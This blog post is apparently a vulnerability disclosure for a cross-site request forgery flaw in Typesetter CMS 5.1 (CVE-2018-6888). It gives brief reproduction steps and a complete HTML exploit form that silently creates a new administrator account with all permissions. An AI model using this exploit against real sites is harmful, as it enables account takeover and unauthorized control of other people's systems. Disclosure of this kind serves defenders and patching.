Cross Site Request Forgery- Type Setter CMS 5.1

By- Navina Asrani

Hi Readers,


Recently while performing some open source security assessment, I came across an CMS “ Typesetter” CMS. Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’. 

Title of the Vulnerability:  Cross Site Request Forgery.
Common Vulnerability Scoring System: 8.0
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source code is coded in a way which allows malicious crafted HTML page to be executed directly without any anti csrf countermeasures.

CVE ID allocated:  CVE-2018-6888

Product & Service Introduction: TypeSetter 5.1

Steps to Re-Produce –
1.       Visit the application
2.       Visit the User Permissions Page.
3.        Goto add user, and create a csrf crafted exploit for the same , upon hosting it on a server and sending the link to click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application modification to complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a risk can lead to user data compromise as well as account takeover
Exploit code:
<html>

  <body>
    <form action="http://localhost/cms/Admin/Users" method="POST">
      <input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />
      <input type="hidden" name="username" value="samrat&#95;test" />
      <input type="hidden" name="password" value="sam9318" />
      <input type="hidden" name="password1" value="sam9318" />
      <input type="hidden" name="algo" value="password&#95;hash" />
      <input type="hidden" name="email" value="sam9318&#64;gmail&#46;com" />
      <input type="hidden" name="grant&#95;all" value="all" />
      <input type="hidden" name="cmd" value="newuser" />
      <input type="hidden" name="aaa" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: 5.1
Solution - Fix & Patch: The application code should be configured with an anti csrf token to mitigate the issue of Cross Site request forgery.





Comments

Popular posts from this blog

Arbitrary file upload and RCE in Wonder CMS

Stored XSS in Wonder CMS

WPA2 KRACK unleashed